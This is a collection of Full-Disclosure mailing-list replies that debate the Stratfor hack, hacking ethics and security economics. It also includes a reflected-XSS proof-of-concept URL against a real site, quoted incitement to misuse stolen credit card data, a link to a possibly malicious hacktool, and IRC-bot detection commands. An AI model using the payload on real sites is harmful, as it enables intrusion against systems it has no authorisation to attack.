Really though, what difference does it make if copyright industries are losing money? When last I checked, the stagecoach industry lost lots of money when the automobile was invented. Would you claim that people were stealing from stagecoach drivers by failing to support that industry and instead using their cars? Are you crying foul when people use digital cameras and incur losses for the film industry? Who was stealing from all those sheet music copyists and printers who lost their jobs because of the recording industry? Industries need to adapt to the times, or else they die. What makes recording, movie production, etc. so special?

you forgot to link the original article, fixed it for you: http://torrentfreak.com/the-red-flag-act-of-1865-110626/

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] dos attack on all 32bit php, asp etc services ?
On Sun, Jan 15, 2012 at 2:43 PM, Leutnant Steiner chk.mail...@gmail.com wrote:

hi,

just for a nice sunday afternoon video, if not already known see: http://www.phpclasses.org/blog/post/171-PHP-Vulnerability-May-Halt-Millions-of-Servers.html

did someone experience the impacts described for this vulnerability? are you all on 64bit

greetz

you are a little bit late with that. http://nikic.github.com/2011/12/28/Supercolliding-a-PHP-array.html

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Rate Stratfor's Incident Response
On Sat, Jan 14, 2012 at 4:33 PM, Sanguinarious Rose sanguiner...@occultusterra.com wrote:

I've been watching this chat for a while

you didn't watch properly. nobody said that you shouldn't report vulnerabilities. we discussed whether it would help or not if one would hire the kiddies owning their sites. and we discussed why it is bad if you report the vulnerability and back it up with the proof that you compromised that said system.

I always report the vulns that I stumble upon (from my own email and such) and while I'm doing this in good faith, I would never dare to actively exploit that vuln for better proof, because if they sue me, they would win. So I try to keep it that way, that I cannot be held responsible, because I didn't break any law. I also think that for a full penetration test, one shouldn't act without prior agreement with the owner and having that written down.

To go back to the irl analogy: even if I'm doing it in good faith, so that I would report to the owner or fix the lock myself, I shouldn't try to open every door and window on a random house, nor should I take a photo of his belongings so that I can prove that I was there.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Rate Stratfor's Incident Response
On Thu, Jan 12, 2012 at 10:46 PM, Benjamin Kreuter ben.kreu...@gmail.com wrote:

On Thu, 12 Jan 2012 16:06:53 -0500 valdis.kletni...@vt.edu wrote:

On Thu, 12 Jan 2012 15:16:19 EST, Benjamin Kreuter said:

Really, calling it "breaking in" is a stretch. You connected a computer to a publicly accessible computer network, where anyone can send anything to your computer. If hacking such a system is "breaking in", you might as well claim that shouting across your neighbor's yard is "breaking in".

Bad analogy. Closer would be if you have a house that's got a driveway on a public street, and you claim it's not breaking and entering if you walk up the driveway, try the doorknob, find it unlocked, and let yourself in without the permission of the residents. Saying that anybody could walk up and let themselves in the door doesn't make it legal.

Would you say that we should arrest the person who walks into the house, takes a picture of themselves standing next to an expensive television and leaves the picture next to a note that says "your door was unlocked"?

yeah, it would still be an offence in most countries.

Really though, it is still a terrible analogy. You can disconnect a computer from the Internet; you cannot disconnect a building from a street. A hacker in a foreign country might be attacking your computer system from that country, and could be outside the jurisdiction of any relevant law enforcement agency; a person who breaks into a building is committing a crime in whatever jurisdiction the building is in.

the crime would still be a crime in the country where the building/computer is located, you just can't get the offender prosecuted, just like if he would flee the country after trespassing into your house.

Analogies are nice and they help non-technical folks understand what is going on, but let's not get carried away with them. Someone who attacks a computer system over the Internet (or any other network) is sending unwanted/malicious messages. This is not the same as physically breaking into a building, locker, or computer. It may be illegal, but it is still very different from other crimes.

why is it different? the only difference imo is that the whole IT/networking stuff is relatively new, and the law was lagging behind, and some people still think that it is, when it isn't really anymore. you can get the same amount of fine/years in prison whether you stole the money/confidential info through physical or electronic means.

If anything, the closest type of criminal would be a con man, which seems fitting given how many of today's attacks have an element of social engineering.

nope. of course social engineering can be compared to a confidence trick, because it is a confidence trick. but social engineering is only one vulnerability from the many, and usually it is used together with other methods (you get the credentials using that, then you proceed and access the system using those credentials, which is gaining unauthorized access to the system).

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
Well that's what you get when you let profit margins dictate security policy. You guys act pretty tough when you argue with each other online but you can't stand up to some corporate idiots? Sounds like this industry could benefit from these kids even more since they are driving home the points you all are supposed to be warning them about.

Maybe you should try out at your company to hire a kiddie, and tell us how it turned out. Usually the ones shittalking here are those without a decent job imo...

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
On Thu, Jan 12, 2012 at 10:53 AM, Laurelai laure...@oneechan.org wrote:

On 1/12/12 3:49 AM, Ferenc Kovacs wrote:

Well that's what you get when you let profit margins dictate security policy. You guys act pretty tough when you argue with each other online but you can't stand up to some corporate idiots? Sounds like this industry could benefit from these kids even more since they are driving home the points you all are supposed to be warning them about.

Maybe you should try out at your company to hire a kiddie, and tell us how it turned out. Usually the ones shittalking here are those without a decent job imo...

-- Ferenc Kovács @Tyr43l - http://tyrael.hu

I have a great job.

so you think that you are shittalking? or how else could your job be relevant here?

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
Because the ones with the so called ethics either lack the technical chops or lack the enthusiasm to find simple vulnerabilities. Not very ethical to take a huge paycheck and not do your job if you ask me.

If the only thing missing to secure those systems was somebody being able to use sqlmap and xss-me, then that could be fixed without hiring people who already proved that they aren't trustworthy. from my experience, the lack of security comes from the management, you can save money on that (and qa) in the short run. so companies tend to hire QSA companies to buy the paper which says that they are good, when in fact they aren't. most of them don't wanna hear that they are vulnerable and take the risks too lightly. if they would take it-security seriously it simply couldn't be owned through trivial, well-known attack vectors.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Astaro Security Gateway v8.1 - Input Validation Vulnerability
On Mon, Jan 9, 2012 at 3:15 PM, Markus Hennig markus.hen...@sophos.com wrote:

Hi all,

Astaro hereby confirms the described vulnerability. In spite of the text below it is not remotely exploitable, but needs a valid administration account to access the web configuration interface called WebAdmin.

if it is an XSS attack, then why would the attacker need an account to exploit it?

Within WebAdmin a privilege escalation is the worst case scenario which can happen. The user with higher privileges has to open a preview window of a XSS manipulated object.

yeah, if the malicious person can bait a logged-in user to visit the prepared url, that would allow the attacker to create an account.

Because every access and all object modifications are logged with username and IP and because the issue is not remotely exploitable we will fix it within the regular Up2Date schedule with release of version 8.301.

uhm, I don't see why proper logging would mitigate the fact that the system is compromised. but it is a good thing that you are fixing it.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
Although you didn't address me, I also called them kiddies, so here are my thoughts.

Valdis you make me curious - how do you know that most are kids, and script kiddies?

Valdis didn't state that the majority of the hackers are kids, or script kiddies, what he did state:

Perhaps these companies should try to hire the kids owning them instead of crying to the feds.

Most of the kids are skript kiddies,

So Laurelai implied that the companies are owned by kids, and Valdis replied that those kids are mostly script kiddies.

The label 'script kiddies' has been used for over 20 years and well, kids do grow old... aren't the script kiddies really script men these days?

only if you think that the current kiddies are the exact same people as back then. imo the vast majority of the kiddies will either mature and/or get busted, so he/she will give up on the blackhat stuff, and/or grow in skills so he/she will be a real hacker (in one way, or another).

The label script kiddie tends to downplay their existence. It has a tone of strong security officers, men of renown, men with beards who look down on those petty script kiddies from their high places of arcane knowledge possessed by a mere few.

the term is and always was pejorative/derogatory by definition:

A script kiddie or skiddie,[1] occasionally skid, script bunny,[2] script kitty,[3] script-running juvenile (SRJ) or similar, is a derogatory term used to describe those who use scripts or programs developed by others to attack computer systems and networks and deface websites.[4]

http://en.wikipedia.org/wiki/Script_Kiddie

Isn't it more likely that the people who massively pwned Stratfor are indeed mature and serious?

imo most script kiddies are teens/young adults, and I also think that most teens/young adults who are interested in IT security only have script kiddie skills.

My reasons to believe this:

- learning serious skills takes some time, so it is fairly rare to have those at such a young age, so most of the young ones usually aren't there yet. of course if you only have to master sqlmap and xss-me then it is a different story.

- kids are more likely to take serious risk for the fun or fame only: they aren't mature enough to be afraid of the consequences and they don't have an existence which they are afraid to lose. on a related note see http://www.medicinenet.com/script/main/art.asp?articlekey=51852

It's easy to establish that the lulzboat people for lack of a better term, are more mature than the technicians at Stratfor will ever be. Better to call them security kiddies, I can understand that.

in what meaning are you using the word mature here? they (LulzSec) are/were trolling the industry, they didn't really show anything new, just that the OWASP top10 vulns are still there, even for big companies. I would be really surprised if it were ever discovered that the main players behind LulzSec were over 25, or that they had a family to take care of. even if you could get away with the shit that they put up, a mature person wouldn't risk getting busted over what they achieved (fame and fun).

Of course this is only my opinion on the issue, maybe somebody else with more experience in the field can come up with a better explanation or point out the flaws in my logic.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Fwd: Fw: Who is behind Stratfor hack?
nice job letting him control you!

On Sun, Jan 8, 2012 at 6:16 PM, Laurelai laure...@oneechan.org wrote:

I don't know why you emailed this to me, perhaps you were looking for attention or something, so I've forwarded it to the FD list so you can get all the attention you want. Cheers.

Original Message
Subject: Fw: Who is behind Stratfor hack?
Date: Sun, 8 Jan 2012 00:06:23 -0800 (PST)
From: andrew.wallace andrew.wall...@rocketmail.com
Reply-To: andrew.wallace andrew.wall...@rocketmail.com
To: Laurelai laure...@oneechan.org

- Forwarded Message -
From: andrew.wallace andrew.wall...@rocketmail.com
To: feedb...@stratfor.com
Sent: Saturday, December 31, 2011 1:50 AM
Subject: Who is behind Stratfor hack?

If this turns out to be the person who hacked your web site, I would like a cash reward.

Andrew

---
http://pastebin.com/f7jYf5Wd

46. lol xD
---

Should we read into this too much?

Andrew

---
48. We almost have sympathy for those poor DHS employees and australian billionaires who had their bank accounts looted by the lulz (orly? i just fapped).
---

The guy we know is australian...

Andrew

---
51. We call upon all allied battleships, all armies from darkness, to use and abuse these password lists and credit card information to wreak unholy havok upon the systems and personal email accounts of these rich and powerful oppressors. Kill, kitties, kill and burn them down... peacefully. XD XD
---

Signed as XD again.

Andrew

---
Last email I have from him is 23rd December... same kind of grammar as the Stratfor pastebin. It seems he disappeared just as the Stratfor news broke just before Christmas.

Andrew

- Forwarded Message -
From: xD 0x41 sec...@gmail.com
To: Larry W. Cashdollar lar...@me.com
Cc: full-disclosure@lists.grok.org.uk
Sent: Friday, December 23, 2011 1:26 PM
Subject: Re: [Full-disclosure] Mobile Prank Hacktool

hi Larry! Hope you're doing well mate ;) , anyhow, here.. i did manage to get it via windows..maybe megaupload.com has blocks for lynx or other linux ? not sure and, not caring to test,..lol...anyhow, same file..enjoy, cheers. (Oh, i'd always run this with at least a basic Sandbox, like sandboxie, which would make sure that we never lose our data in case there is malware, which, usually tools like this always do..but, anyhow, it is not from me, altho, many would probably wish it was :s sad...

Looks like the link is unavailable.

-- Larry C$

Oh, i was able to download what looks like, a very interesting application and files..very cool...well, to look atm, atm :P I did browse the src, just then directly upped it to hotfile.com..i think lynx is a bit better with hotfile...anyhow, here is a working link: http://hotfile.com/dl/138283571/f9ef676/Mobile_Prank_Hacktool.rar.html

anyhow, cheers larry, let me know if it worked, if not, i'll put it on a ftp or sumthin :s but, then i'd be checking my own connection :P~ lol...tc buddy! XD // hax...@haxshells.us @ crazycoders.com crazycoders.us

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
On Sat, Jan 7, 2012 at 8:10 PM, Jeffrey Walton noloa...@gmail.com wrote:

http://bolt.thexfil.es/84e9h!t was an interesting link - it demonstrated the pwnage. It looks like these folks gained access via PHP. Stratfor was using a Linux based system, but PHP was version 1.8 from 2009 (perhaps with some back patches). Current version of PHP is 5.3.8 (http://www.php.net/).

O really? PHP 1.8? how would you compile that on a modern linux distro? how would you run drupal on top of it?

// $Id: default.settings.php,v 1.8.2.4 2009/09/14 12:59:18 goba Exp $

that is a line from the default drupal config file.

I agree that the php app was the most likely source of the intrusion, I would guess that they didn't keep the drupal core and the contrib modules up-to-date, and they were owned through some old vulnerability.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
On Sun, Jan 8, 2012 at 12:03 AM, Laurelai laure...@oneechan.org wrote:

On 1/7/12 3:50 PM, valdis.kletni...@vt.edu wrote:

On Sat, 07 Jan 2012 16:25:35 EST, Shyaam Sundhar said:

Although, once they have gained popularity and to a stage where a garage office becomes a shop floor and a @home biz becomes a rent-a-million$-building office, it is time to shift priorities.

If finding people who are competent enough to secure a payroll system for a company of 10 people is difficult, what makes you think that it's easy to find people who can secure the systems for a company of 1,000? As Stratfor has demonstrated, the talent pool of *really* competent security people is shallow enough that there's not even enough to secure the security companies. And it's not just Stratfor - when was the last time this list went a week without mocking a security company for its lack of clue? It's an industry-wide problem - there's a *severe* shortage of experts.

And even though schools like DeVry and ITT are churning out lots of people with entry level certifications, I'm not at all sure that helps the situation - we end up with a lot of people who are entry level, and don't realize how much they don't know. That makes them almost more dangerous than not having anybody at all. Sort of like if you walk alone through a scary part of town, you actually stand a good chance because you *know* you're alone and will act accordingly - but if you have a bodyguard with you, you're likely to act differently, and end up totally screwed when you find out said bodyguard has a belt in martial arts, but zero experience in street fighting...

Perhaps these companies should try to hire the kids owning them instead of crying to the feds.

why do you think that kiddies using tools like sqlmap would be able to defend them from other kids?

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
On Sun, Jan 8, 2012 at 1:24 AM, Laurelai laure...@oneechan.org wrote:

On 1/7/12 6:20 PM, valdis.kletni...@vt.edu wrote:

On Sat, 07 Jan 2012 17:37:44 CST, Laurelai said:

Because they pay the kids to own them in a safe manner to show that

It's not as simple as all that. A good pen-tester needs more skills than just how to pwn a server. You need some business smarts, and you need to be *very* careful about writing the rules of engagement (some pen tests that involve physical attacks can literally get you shot at if you screw this part up), and then *sticking with them* (you find a major social engineering problem while doing a black-box test of some front-end servers, you better re-negotiate those rules of engagement before you do anything else).

Also, once a pen test starts, you can't take your time and poke it with the 3 or 4 types of attacks that you're good at - you have 3 weeks starting at 8AM Monday to hit it with 37 different classes of attacks they're likely to see and another 61 types of attacks they're not likely to see and aren't expecting. And be prepared to work any one of those 94 from "looks like might be an issue" to something you can put in a report and say "You Have A Problem".

Almost no company is stupid enough to hire a pen testing team without that team posting a good-sized performance bond in case of a screw-up taking out a server, or a rogue pentester stealing the data. (ESPECIALLY in this case, you *already* caught them stealing the data once :) And the kids are going to land a $1M performance bond, how? (Hint - think this through. Really good pentesters make *really* good bucks. If those kiddies had what it took to be good pentesters, they'd already be making bucks as pentesters, not as kiddies)

their so called experts are full of shit, then they fire said experts and hire competent people saving time money and resources, try and

Doesn't scale, because there's not enough competent people out there. There's 140 million .coms, there aren't 140 million security experts out there. It's not a new idea - I've heard it every year or two since probably before most of the people on this list were born. The fact that almost no companies actually *do* it, and that those hackers who have successfully crossed over to consulting are rare enough that you can name most of them, should tell you something about how well it ends up working in practice.

Well enjoy your doomed industry then. I'll continue to take great pleasure as the so called experts get owned by teenagers.

imo public shaming (ie. owned by kiddies, usually they get bigger media attention) can force companies to take security more seriously, but imo hiring the kiddies isn't the solution. even if he/she happens to be the superstar, who given the chance would be able to secure your infrastructure, the industry is rotten mostly because it-sec isn't as high a priority as it should be. it is an added value, usually bolted on top of the screwed up legacy processes/software, and the higher-ups expect it to be bought by money alone. they would pay for the cert, they would pay for the hacker-proof seal, they would pay for the insurance, and the decent looking it-security consultant company, but they won't change the flawed processes, and the bad priorities. of course many of them will get owned, lose a good chunk of money, some of them even will go out of business, but until most of them can get away with that broken model, they won't try to fix the underlying problem.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
On Sun, Jan 8, 2012 at 2:42 AM, valdis.kletni...@vt.edu wrote:

On Sun, 08 Jan 2012 01:37:21 +0100, Ferenc Kovacs said:

imo public shaming (ie. owned by kiddies, usually they get bigger media attention) can force companies to take security more seriously, but imo hiring the kiddies isn't the solution.

It matters a lot less than you think. Go look at Sony's stock price while they were having their security issues - it was already sliding *before* PSN got hacked, but continued sliding at the *exact same rate* for several months, with no visible added dip due to the multiple hacks they had. The hack at TJX didn't cripple that company either. Cost them a bunch, but nothing they couldn't survive - most companies that size already budget a lot more for unforeseen events than the hacks cost them.

able to secure your infrastructure, but the industry is rotten mostly because it-sec isn't as high priority as it should be.

As high priority as the IT Sec people usually think it should be, or as high priority as a cold hard-line analysis of business cost/benefits says it should be? IT people tend to be *really* bad at estimating actual bottom-line costs.

it is an added-value, usually bolted-on top of the screwed up legacy processes/softwares, and the higher-ups expect it to be bought by money alone.

Remember that at the C level, *everything* is bought by money alone. An initiative will cost $X in capex, $Y in manpower costs, and is predicted to return $Z per year. If Z is bigger than X+Y, we proceed, if not, we don't. (Of course, the fun is in nailing X, Y and Z down to accurate numbers :)

company, but they won't change the flawed processes, and the bad priorities.

Remember that computer security is almost always a cost center, not a profit center, and one of those bad priorities is usually "make more money". They aren't going to change the flawed process (which will cost money), unless you can demonstrate how that will impact the bottom line. Just like I *could* replace my already-paid-off car that gets 27 miles to the gallon with one that gets 42, and save $50/month in gas - but then have a $250/month car payment to make. That doesn't make fiscal sense, and often neither does fixing the flawed process.

of course many of them will get owned, lose a good chunk of money, some of them even will go out of business, but until most of them can get away with those broken model, they won't try to fix the underlying problem.

And you know what? *Every single decision* a business makes is like that. You run a restaurant, and make a bet that you can sell a fajita that's 20% bigger than your competitor, for 50 cents less, and still make money. Maybe you're right, and you end up expanding into a nationwide fajita chain. Maybe you're not - something like 50% of restaurants fold in under 3 years.

You manage an office building complex, and make a bet that if there's a fire, only one of the buildings will burn down and not all of them, so you don't insure for everything burning down because that's a *lot* higher premium per year and you don't really see them *all* burning as being likely. If one burns down, you collect the insurance, rebuild, and get on with running an office complex. If they all burn down, you're probably screwed. Unless you're one lucky guy like Larry Silverstein, and they're ruled separate events at the WTC so you get paid for all the buildings anyhow: http://articles.cnn.com/2004-12-06/justice/wtc.trial_1_larry-silverstein-single-occurrence-insurers?_s=PM:LAW

You run a company, and make a bet that there's only a X% chance of being hacked, and it will probably cost you $Y, so you spend $Z. Maybe you guess wrong, like Sony did, maybe you don't, and all the money you didn't spend on security becomes profit, not cost. But it's the same thing - you estimate your chances, and place your bet. It's called "the way business works".

it seems that you are missing my point. I don't try to say that security should be the top priority, I'm saying that:

- it should be handled the same way as QA, it's not a feature, it's a way of doing things, you can't just buy it from a vendor without changing anything on your side.

- currently the efforts for it security in most cases are below what a formal risk analysis/evaluation would identify for most of the companies out there. A kiddie with no formal education, or relevant experience, but with being handy using a pc and the internet shouldn't be able to own companies and create loss/steal millions of dollars.

So I would be curious what is your opinion about those two points.

btw: Sony is a good counter-example, but we also see CA companies recently going out of business after being hacked, usually losing customer trust is more grave where the trust is more important to begin with. Maybe people didn't start buying less Sony phones/tvs/ps3, etc. but I would bet, that less
Re: [Full-disclosure] PenTest mag
http://pentestmag.com/wp-login.php?action=register&user_login=john@somewhere.com%3C/sCrIpT%3E%3CsCrIpT%3Ealert(87118)%3C/sCrIpT%3E

2011/12/8 Gage Bystrom themadichi...@gmail.com: Not really. If it isn't exploitable in any sense of the word it's not a vulnerability. It's akin to opening up Firebug, writing the generic XSS PoC and calling the site vulnerable :P I'd love to bash on these guys as much as you want to, but let it be a real vulnerability. If it is one, then kudos.

On Dec 7, 2011 3:16 PM, Tomy supp...@vs-db.info wrote: it does not matter, it's about the fact that someone who publishes such a newspaper should know his stuff.. Tomy

Message written by Gage Bystrom on 8 Dec 2011, at 00:04: Nice, but is it stored? Or at least reflective?

On Dec 7, 2011 2:59 PM, Tomy supp...@vs-db.info wrote: still vulnerable: sample: http://pentestmag.com:80/wp-login.php?action=register (XSS) e-mail: john@somewhere.com</sCrIpT><sCrIpT>alert(87118)</sCrIpT> LOL

Message written by xD 0x41 on 7 Dec 2011, at 23:30: Tomy supp...@vs-db.info

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] prosec
yeah, I can confirm that this image was served on the original url.

On Tue, Dec 6, 2011 at 5:38 PM, adam a...@papsy.net wrote: Pretty sure it's supposed to be: http://de-motivational-posters.com/images/karma-sometimes-assholes-get-what-they-deserve.jpg

On Tue, Dec 6, 2011 at 10:34 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: No workie.

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of white powder
Sent: Tuesday, December 06, 2011 3:10 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] prosec

http://130.89.241.130/~tjibbe/pics/karma-sometimes-assholes-get-what-they-deserve.jpg u had it comin, kcope AB u will be next welcome to the age of the whitehat

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] one of my servers has been compromized
On Mon, Dec 5, 2011 at 11:44 AM, Lucio Crusca lu...@sulweb.org wrote: Hello *, I'm not new here, but I've mostly lurked all the time through gmane. I never believed it could happen to me until it actually happened: they compromised one of my servers. It's an Ubuntu 10.04 server with all security patches regularly applied. I'm inclined to believe they used some hole in the web application, which is an old customized Virtuemart version (1.1.3), which is not upgradable because of the invasive code customizations (I'm not the author of that code, so I have no clue about what had been changed back then). Now the problem for me is to track down the security hole. Here is the email my provider received and forwarded to me:

Subject: ISP Report; botnet activity on irc.undernet.org [...]

Hello, I am an operator on the irc chat network, irc.undernet.org and I would like you to investigate the owner of the IP addresses that are listed at the foot of this email. This/these host(s) have likely been compromised, had an altered/rogue process installed, and were part of a botnet that was found on our network. The exploit or compromise running on this system is likely to be an irc bot. Can you please alert the person who is responsible for its security to patch/upgrade, remove the irc process and secure their system.

= Unix System owners =
A favourite place for hiding the bot(s) is in /tmp and in /var/tmp/ or /dev/shm/ or in a user's home directory; sometimes it may be hidden like /tmp/. ./ or similar. The bot files can usually be found by running these one line commands as the root user.
find / -exec grep -l undernet {} +
find / -exec grep -l sybnc {} +
find / -name '*.set' | perl -pe 's/.\/\w+-(\w+)-.*/$1/' | sort | uniq
find / -name inst | perl -pe 's/.\/\w+-(\w+)-.*/$1/' | sort | uniq
netstat -tanp
lsof -i tcp:<port number>

*netstat: look for connections to remote port 6667 or the range of ports between 6660-7000; once you find the port you can use the command lsof -i tcp:portnumber to determine which process/user it is running under, and terminate it.

= Windows System Owners =
Most windows bots are mIRC scripted bots and generally need a file called mirc.ini to run; you should search for this file. Run a good antivirus scanner and firewall.

This IP/host may be removed from our IRC network due to the risks it presents to our users. Should you need any help with removing the files or bot process, feel free to contact me by mail or on our network, which you connect to using any irc client and issuing /server irc.undernet.org

I look forward to your reply
Scot

* Affected host/IPs, capture time is GMT+1: United Kingdom and servers they were connected to. Please note: when resolving server names to IP addresses, all our servers end with .undernet.org (for example) Tampa.FL.US. is actually Tampa.FL.US.undernet.org
Important: If you reply to this mail needing further information, please leave this mail intact, or supply us with the IP address(es) in question, as we reference these mails by the unique IP address
Time of Capture: DECEMBER 3, 2011 10:03:48 PM
List of IP address(es) and server it connected to: my.server.ip.address (CHICAGO.IL.US BUDAPEST.HU.EU MONTREAL.QC.CA.undernet.org)

I've run the find commands and found a number of files with the first find, under /tmp/.m. Deleted them, looked up remote connections with netstat, killed perl processes that were trying to connect to port 6959 (only trying because I've now set up iptables so that they actually can't), but those processes kept spawning.
Checked crontab of www-data, found the launcher, removed it. Now the problem is: how do I prevent further abuse? What should I search in the logs (if anything) to spot the security hole? TIA Lucio.

If you take security seriously, you should remove that box from the network (or take a snapshot and wipe everything and reinstall from scratch), and start the investigation according to your (security) incident response plan. In the meantime you can start restoring the services on a clean server, but you should consider the compromised server as fully compromised, so you shouldn't restore data from that server until you can guarantee, with proof, that the data is intact/genuine. http://en.wikipedia.org/wiki/Computer_security_incident_management Based on your area of business, you can be obligated to report the breach to some kind of authority and co-operate with them resolving the issue. If you have offsite backups and/or external logs which you can trust, those can help you to pinpoint when the breach happened, and to what extent
Re: [Full-disclosure] Large password list
On Fri, Dec 2, 2011 at 10:26 PM, Charles Morris cmor...@cs.odu.edu wrote: Valdis, (For real fun, consider that published and unpublished works are treated differently. And a password list almost always becomes a published work without the permission of the author(s) ;) Talking of currently implemented systems... One could argue that the author of lists resulting from cracked hashes is the cracker, as the cracker is simply computing one of the infinite collisions that each hash intrinsically has.

on a related note: http://en.wikipedia.org/wiki/Illegal_number http://en.wikipedia.org/wiki/Illegal_prime

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Client aproach
how not to do it: http://www.securityweek.com/hungarian-man-pleads-guilty-hacking-marriott-systems-demanding-job-it-dept http://www.infoworld.com/d/security-central/hungarian-man-charged-hacking-sony-ericsson-site-047

On Wed, Nov 30, 2011 at 11:56 AM, Miguel Lopes theoverb...@gmail.com wrote: Hi List, I found some major design flaws and vulnerabilities on a local webstore, but now I would like to tell the owner nicely and maybe profit from it?! Does anyone have some tips on how to inform a potential client of their vulnerabilities? Thanks in advance, Miguel Lopes

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Context IS Advisory - Apache Reverse Proxy Bypass Vulnerability
On Wed, Oct 5, 2011 at 7:15 PM, Context IS - Disclosure disclos...@contextis.co.uk wrote:
===ADVISORY==
Systems Affected: Apache httpd
Severity: High
Category: Proxy Bypass
Author: Context Information Security Ltd
Reported to vendor: 16th November 2011
Advisory Issued: 5th October 2011
Reference: CVE-2011-3368
===ADVISORY==

It seems that the apache devs couldn't properly fix this: http://marc.info/?l=apache-httpd-dev&m=132205829523882&w=2

Prutha Parikh from Qualys reported a variant on the CVE-2011-3368 attack against certain mod_proxy/mod_rewrite configurations. A new CVE name, CVE-2011-4317, has been assigned to this variant.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] CodeV discovers 31 vulnerabilitys on 5 OS softwares
There was an error!Your code was not submited.

On Wed, Nov 23, 2011 at 12:11 PM, Press - Dognædis pr...@dognaedis.com wrote: Dear FullDisclosure, CodeV is a static code analysis tool (currently for php only, but soon to be extended to other languages) developed by Dognaedis (https://www.dognaedis.com/) to offer a tool to integrate into the software development life cycle in order to detect vulnerabilities that arise from bad input validation as soon as they hit the code. The tool has a public demo version that is limited to a script with 250 lines of code and is available at https://codev.dognaedis.com/. We analyzed some Open Source software to test our own tool and discovered 31 new vulnerabilities in 5 different open source software packages. Following responsible disclosure of the vulnerabilities discovered throughout CodeV's Open Source Software analysis, we are here reporting all the vulnerabilities discovered as soon as possible to the community, offering security not only to our clients but to the entire public. All the vulnerabilities brought to the public previously followed the necessary disclosure protocol with the responsible teams. The vulnerabilities discovered can be found at https://www.dognaedis.com/vulns/. Thank you for your time and we hope you enjoy CodeV. -- Press - Dognaedis Dognædis, Coimbra - Portugal http://www.dognaedis.com

PRIVACY STATEMENT: This message is strictly confidential and must be accessed only by the persons and/or entities to whom it was addressed; the disclosure, modification, viewing, or any other type of use of this message by third parties is not permitted. If you are not one of the addressees, Dognædis would be grateful if you informed the sender as quickly as possible about the misdelivery that occurred.

DISCLAIMER: This message is confidential in any way, and can only be accessed by the persons or entities to whom it is addressed.
If you are not one of them, Dognædis will thank you if you inform the author, as soon as possible, about the error that occurred. The disclosure, modification, visualization, or any other kind of use of the message and its contents by those who are not addressed herein is totally forbidden.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] NEVER AGAIN
Maybe it's not the case now, but I experienced multiple times on this list that the replies arrived hours before the original mails, so I wouldn't be surprised if the mails from Andrew were also reply-all.

On Tue, Nov 22, 2011 at 3:14 PM, Christian Sciberras uuf6...@gmail.com wrote: James, could you please stop publishing emails intended for private use? It's getting plain ridiculous the amount of crap from this list I (and the rest) have to deal with every day.

On Tue, Nov 22, 2011 at 3:06 PM, James Rankin kz2...@googlemail.com wrote: Whatever

On 22 November 2011 14:05, andrew.wallace andrew.wall...@rocketmail.com wrote: The email is nothing to do with me or my consultancy. You need better analysis skills and a good lawyer. --- Andrew Wallace

From: James Rankin kz2...@googlemail.com
To: andrew.wallace andrew.wall...@rocketmail.com
Cc: Darren Martyn d.martyn.fulldisclos...@gmail.com; Antony widmal antony.wid...@gmail.com; xD 0x41 sec...@gmail.com; Martin Allert all...@arago.de; full-disclosure@lists.grok.org.uk; phocean 0...@phocean.net; Nikolay Kichukov hijac...@oldum.net; valdis.kletni...@vt.edu
Sent: Tuesday, November 22, 2011 2:01 PM
Subject: Re: [Full-disclosure] NEVER AGAIN

Strange. Your other personality said much the same thing.

On 22 November 2011 13:57, andrew.wallace andrew.wall...@rocketmail.com wrote: You're making the worst mistake possible for yourself. --- Andrew Wallace

From: James Rankin kz2...@googlemail.com
To: andrew.wallace andrew.wall...@rocketmail.com
Cc: Darren Martyn d.martyn.fulldisclos...@gmail.com; Antony widmal antony.wid...@gmail.com; Martin Allert all...@arago.de; full-disclosure@lists.grok.org.uk; phocean 0...@phocean.net; Nikolay Kichukov hijac...@oldum.net; valdis.kletni...@vt.edu
Sent: Tuesday, November 22, 2011 1:51 PM
Subject: Re: [Full-disclosure] NEVER AGAIN

Consultancy. Hehe.
You seriously need treatment for schizophrenia. Why don't you go and argue with your alter ego? Please tell your solicitor he is welcome to talk to mine any day. Regards, JR

On 22 November 2011 13:48, andrew.wallace andrew.wall...@rocketmail.com wrote: I think you are mistaken, this email is not sent by my consultancy. I ask you to retract your statement or face legal action. --- Andrew Wallace Independent consultant https://plus.google.com/115085501867247270932/about

-- On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question.

IMPORTANT INFORMATION/DISCLAIMER
